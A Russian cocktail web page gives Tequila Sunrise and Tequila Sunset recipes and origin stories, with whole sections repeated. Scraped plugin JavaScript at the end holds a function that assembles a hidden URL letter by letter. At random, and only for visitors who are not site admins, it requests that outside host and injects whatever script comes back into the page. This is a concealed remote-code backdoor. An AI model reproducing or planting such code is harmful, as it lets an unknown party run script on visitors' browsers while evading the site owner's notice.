Коктейль Текила санрайз

Коктейль Текила Санрайз (Tequila Sunrise) – восход солнца по-мексикански

Во время ритуалов племена ацтеков пили сок агавы на рассвете. В дань памяти о своих предках мексиканцы создали алкогольный коктейль «Tequila Sunrise», внешний вид которого напоминает восход солнца. Напиток получился не только красивым, но и очень вкусным. Через несколько мгновений вы научитесь готовить Текила Санразс в домашних условиях. Мы разберем все нюансы.

Историческая справка. Рецепт коктейля «Текила Санрайз» придумали в 30-40 гг. бармены гостиницы Arizona Biltmore Hotel, которая находится на границе Мексики и США. Напиток стал известным благодаря рок-группе «The Rolling Stones». Во время своего турне по США в 1972 году музыканты пили только этот коктейль.

Существует правдоподобная легенда, что однажды в баре Мик Джагер (лидер Роллинг Стоунз) попросил сделать ему коктейль «Маргарита». В ответ бармен предложил музыканту попробовать альтернативу – Текилу Сансайз (по составу оба напитка очень похожи). Джагер согласился. С тех вся группа не признавала других коктейлей кроме Tequila Sunrise.

Сейчас коктейль Текила Санрайз входит в официальный список IBA (International Bartenders Association) – Международной ассоциации барменов. Это значит, что его рецепт должен знать каждый уважающий себя бармен.

Основные характеристики Tequila Sunrise:

  • крепость: 11,4%;
  • категория: long drink (коктейль большого объема);
  • степень сложности: простой;
  • время приготовления: 1 минута;
  • объем стандартной порции: 150 мл;
  • рекомендуемый бокал: Highball (высокий стакан цилиндрической формы объемом 270 мл).

За время своего существования пропорции Текила Санрайз несколько раз менялись, но в итоге один из вариантов всё же стал классическим. Мы рассмотрим именно его.

  • текила – 3/10 части;
  • апельсиновый сок – 6/10 частей;
  • гренадин – 1/10 часть.

Ингредиенты для одной порции:

  • серебряная (прозрачная) текила – 45 мл;
  • апельсиновый сок – 90 мл;
  • гренадин (гранатовый сироп) – 15 мл;
  • кубики льда – 6-7 штук.

Рецепт Текила Санрайз

1. Наполнить льдом хайболл (высокий стакан).

2. Добавить текилу.

3. Налить апельсиновый сок.

4. По центру бокала добавить гранатовый сироп.

5. Размешать ингредиенты коктейльной ложечкой. Градация цветов после смешивания создает эффект, напоминающий восходящее солнце.

6. Сверху украсить напиток вишенкой или ломтиком апельсина.

7. Пить через трубочку.

Для большей наглядности советую посмотреть видео, где хорошо показана вся технология приготовления от Василия Захарова.

Tequila Sunset (Текила Сансет)

Если есть восход, значит, обязательно должен быть и закат. Именно этим принципом руководствовались бармены, создавая этот алкогольный коктейль, который по составу напоминает известный аналог и многие другие коктейли с текилой. Для получения эффекта заката вместо гренадина используется черничный бренди.

  • текила – 50 мл;
  • апельсиновый сок – 100 мл;
  • черничный бренди (ликер) – 20 мл.

1. Налить текилу и апельсиновый сок в бокал, наполненный льдом.

2. Добавить бренди (ликер), подождав, пока он опустится на дно.

3. Украсить вишенкой или кусочком апельсина.

Текила Сансет

  • Коктейль Текила Санрайз Cocktail Tequila Sunrise

    Ингредиенты:

    Текила серебряная – 45 мл
    Сок апельсиновый – 90 мл
    Сироп гренадин – 15 мл

    Рецептура:

    • Наполнить бокал «хайбол» доверху кубиками льда;
    • Налить текилу и апельсиновый сок;
    • Слегка перемешать ложкой;
    • Добавить сверху сироп гренадин и не перемешивать;
    • Украсить можно долькой или кружком апельсина.

    Инвентарь для приготовления:

    История коктейля Текила Санрайз:

    История коктейля «Текила санрайз» неоднозначна, и сказать с точностью год создания этого напитка и его автора никак нельзя. Говорят, что напиток этот был создан неподалеку от мексиканского города Тихуана в отеле «Агуа Кальенте». Именно этот отель был специально открыт для американских гостей во времена «сухого закона» США, и именно в этом отеле название напитка было обнаружено в местных буклетах.

    В этих буклетах коктейль под названием «Sunrise Tequila» был представлен как «напиток богов». Таким образом гостям отеля буквально внушали пить данный коктейль, опираясь на древние традиции — употреблять напитки из сока агавы во время восхода солнца в момент проведения ацтекских ритуалов. Что ж сказать?! «Текила санрайз» во все времена был действительно неповторимо вкусен и внешне привлекателен.

    Как это обычно и бывает, существуют и другие версии происхождения. В одной из них говорится, что коктейль «Текила Санрайз» появился чуть позже — в 40-х годах. И что придумал его один из барменов ресторана при отеле «Аризона Билтмор» в Фениксе в момент, когда к нему подошел один из гостей и попросил сделать что-нибудь с текилой — его любимым напитком. И добавил, чтобы коктейль можно было долго попивать у бассейна, дабы растянуть удовольствие.

    На тот момент в состав «Tequila sunrise» входили сок лайма и черносмородиновый ликер «Creme de Cassis». Где-то добавляли содовую вместо апельсинового сока. Но со временем из за нехватки редкого тогда ликера его перестали добавлять в коктейль. А из-за появления в ингредиентах апельсинового сока, который имеет свою кислотность, перестали добавлять и лайм.

    Есть также истории о том, что коктейль стал известным после знаменитого турне группы «Роллинг Стоунз» в 1972 году, где “Текила Санрайз” уходил на концертах и в гримерках галлонами. Хотя изначально никто и не знал об этом напитке. Просто однажды Мику Джаггеру, который заказал коктейль «Margarita» на одной из встреч с прессой, бармен предложил выпить нечто другое вместо его заказа.

    Помимо всего этого еще и группа “Eagles” назвала в честь коктейля песню, а в 1988 году вышел фильм с Мелом Гибсоном с одноименным названием «Tequila Sunrise». В добавок ко всему группа «Сайпресс Хилл» включила песню с таким же названием в один из своих альбомов. В общем и так понятно, что напиток этот не спроста находится в списке коктейлей Международной Ассоциации Барменов.

    В нынешнем виде коктейль “Tequila Sunrise” – это даже не твист, а совершенно другой, отличающийся от изначальной версии, напиток. Но если в IBA считают, что так должно быть, значит и мы будем так считать. Правда мы думаем, что вам обязательно надо попробовать старую версию этого солнечного яркого прохладительного коктейля:

    • 50 мл текилы;
    • 20 мл сока лайма;
    • 5 мл сиропа Гренадин;
    • 10 мл черносмородинового ликера;
    • Долить содовой до верха бокала.

    Если у вас есть рецепт своего коктейля, обязательно присылайте его нам. Мы разместим его в нашей базе, и о нем узнают другие бармены со всего русскоязычного пространства.

    «Текила санрайз»

    «Текила санрайз» — это легкий и очень приятный на вкус алкогольный коктейль, который готовится на основе знаменитой мексиканской водки и обязательно придется по вкусу любителям сладких напитков и ликеров. Этот коктейль был придуман в Америке в начале XX века, где он завоевал большую популярность среди молодежи и довольно быстро распространился по барам всех стран и континентов. Первоначально в состав коктейля помимо текилы входили сок лаймов и насыщенный черносмородиновый ликер. Густой и тяжелый ликер в процессе наливания медленно опускался на дно, образуя при этом яркий и необычайно красивый градиент цветов, и именно по этой причине коктейль назвали «Текила санрайз», что переводится как «Восход солнца». Позже вместо лаймов стали использовать апельсиновый сок, а черносмородиновый ликер в рецепте был заменен на оригинальный гранатовый сироп гренадин кроваво-красного цвета, благодаря чему этот коктейль стал более сладким и приятным на вкус.

    «Текила санрайз» — это прекрасный вариант легкого и очень вкусного аперитива, который принято подавать на вечеринках или праздничных застольях перед основной горячей едой. Такой нарядный и не перегруженный алкоголем напиток способен довольно быстро разбудить аппетит, а кроме того, он располагает к приятной непринужденной беседе и новым интересным знакомствам. Также стоит отметить, что этот коктейль готовится элементарно просто без шейкера, миксера и даже блендера, поэтому он сэкономит вам кучу времени и сил. Все ингредиенты для него нужно просто последовательно смешать в высоком стакане, наполненном льдом, украсить на свое усмотрение и коктейль можно без промедления подавать на стол.

    Попробуйте приготовить этот необычный, яркий и красивый напиток, который летом хорошо освежает и не слишком пьянит, а зимой способен поднять настроение и создать ощущение праздника в любой день. Этот коктейль имеет универсально приятный вкус с нежной сладостью и тонким фруктовым ароматом, который манит, будоражит и нравится практически всем. Хотя по своему виду и вкусу это скорее женский напиток, так как мужчинам может хотеться чего-нибудь покрепче, посуровее и поскромней, тем не менее, отведать бокальчик-другой такого экзотического аперитива вряд ли сможет отказаться даже сильный пол. Коктейль «Текила санрайз», приготовленный по этому простому рецепту, — это оригинальный и вкусный напиток для вечеринки, праздника или просто дружеских посиделок, который приятно удивит, развлечет и расслабит ваших гостей!

    Полезная информация

    Уровень сложности: 1* Размер порции: 150 мл
    Время приготовления: 10 минут Калорийность порции:
    Количество порций: 1 Цена одной порции: 87 руб.

    Как сделать алкогольный коктейль «Текила санрайз» — рецепт в домашних условиях с пошаговыми фото

    ИНГРЕДИЕНТЫ:

    • 45 мл серебряной текилы
    • 90 мл апельсинового сока
    • 15 мл сиропа гренадин
    • много льда

    СПОСОБ ПРИГОТОВЛЕНИЯ:

    1. Для того чтобы приготовить коктейль «Текила санрайз» в домашних условиях, нам понадобится: текила хорошего качества, пакетированный 100%-ный апельсиновый сок без мякоти и фруктовый сироп гренадин. Желательно, чтобы все ингредиенты были холодными, чтобы лед в напитке таял как можно медленнее. Также следует заранее заморозить приличное количество льда.

    2. Стакан для коктейля заполнить доверху кубиками льда, после чего отмерить порцию текилы с помощью мерного стаканчика и вылить ее в стакан.


    3. На текилу налить охлажденный апельсиновый сок. Свежевыжатый сок использовать для приготовления этого коктейля не рекомендуется, так как в нем должно быть минимальное количество мякоти.

    4. На самом последнем этапе налить в бокал сверху сироп гренадин.


    Подавать коктейль «Текила санрайз» следует сразу же после его приготовления вместе с фруктами, сырами, мексиканскими чипсами и другими легкими закусками. Обычно его пьют на вечеринках-фуршетах или в качестве легкого аперитива перед основательным праздничным застольем. Непосредственно перед употреблением коктейль надо размешать соломинкой или специальной палочкой, так как сироп имеет тенденцию опускаться на дно. Веселого вам праздника!

    Коктейль Текила Санрайз Cocktail Tequila Sunrise

    Ингредиенты:

    Текила серебряная – 45 мл
    Сок апельсиновый – 90 мл
    Сироп гренадин – 15 мл

    Рецептура:

    • Наполнить бокал «хайбол» доверху кубиками льда;
    • Налить текилу и апельсиновый сок;
    • Слегка перемешать ложкой;
    • Добавить сверху сироп гренадин и не перемешивать;
    • Украсить можно долькой или кружком апельсина.

    Инвентарь для приготовления:

    История коктейля Текила Санрайз:

    История коктейля «Текила санрайз» неоднозначна, и сказать с точностью год создания этого напитка и его автора никак нельзя. Говорят, что напиток этот был создан неподалеку от мексиканского города Тихуана в отеле «Агуа Кальенте». Именно этот отель был специально открыт для американских гостей во времена «сухого закона» США, и именно в этом отеле название напитка было обнаружено в местных буклетах.

    В этих буклетах коктейль под названием «Sunrise Tequila» был представлен как «напиток богов». Таким образом гостям отеля буквально внушали пить данный коктейль, опираясь на древние традиции — употреблять напитки из сока агавы во время восхода солнца в момент проведения ацтекских ритуалов. Что ж сказать?! «Текила санрайз» во все времена был действительно неповторимо вкусен и внешне привлекателен.

    Как это обычно и бывает, существуют и другие версии происхождения. В одной из них говорится, что коктейль «Текила Санрайз» появился чуть позже — в 40-х годах. И что придумал его один из барменов ресторана при отеле «Аризона Билтмор» в Фениксе в момент, когда к нему подошел один из гостей и попросил сделать что-нибудь с текилой — его любимым напитком. И добавил, чтобы коктейль можно было долго попивать у бассейна, дабы растянуть удовольствие.

    На тот момент в состав «Tequila sunrise» входили сок лайма и черносмородиновый ликер «Creme de Cassis». Где-то добавляли содовую вместо апельсинового сока. Но со временем из за нехватки редкого тогда ликера его перестали добавлять в коктейль. А из-за появления в ингредиентах апельсинового сока, который имеет свою кислотность, перестали добавлять и лайм.

    Есть также истории о том, что коктейль стал известным после знаменитого турне группы «Роллинг Стоунз» в 1972 году, где “Текила Санрайз” уходил на концертах и в гримерках галлонами. Хотя изначально никто и не знал об этом напитке. Просто однажды Мику Джаггеру, который заказал коктейль «Margarita» на одной из встреч с прессой, бармен предложил выпить нечто другое вместо его заказа.

    Помимо всего этого еще и группа “Eagles” назвала в честь коктейля песню, а в 1988 году вышел фильм с Мелом Гибсоном с одноименным названием «Tequila Sunrise». В добавок ко всему группа «Сайпресс Хилл» включила песню с таким же названием в один из своих альбомов. В общем и так понятно, что напиток этот не спроста находится в списке коктейлей Международной Ассоциации Барменов.

    В нынешнем виде коктейль “Tequila Sunrise” – это даже не твист, а совершенно другой, отличающийся от изначальной версии, напиток. Но если в IBA считают, что так должно быть, значит и мы будем так считать. Правда мы думаем, что вам обязательно надо попробовать старую версию этого солнечного яркого прохладительного коктейля:

    • 50 мл текилы;
    • 20 мл сока лайма;
    • 5 мл сиропа Гренадин;
    • 10 мл черносмородинового ликера;
    • Долить содовой до верха бокала.

    Если у вас есть рецепт своего коктейля, обязательно присылайте его нам. Мы разместим его в нашей базе, и о нем узнают другие бармены со всего русскоязычного пространства.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};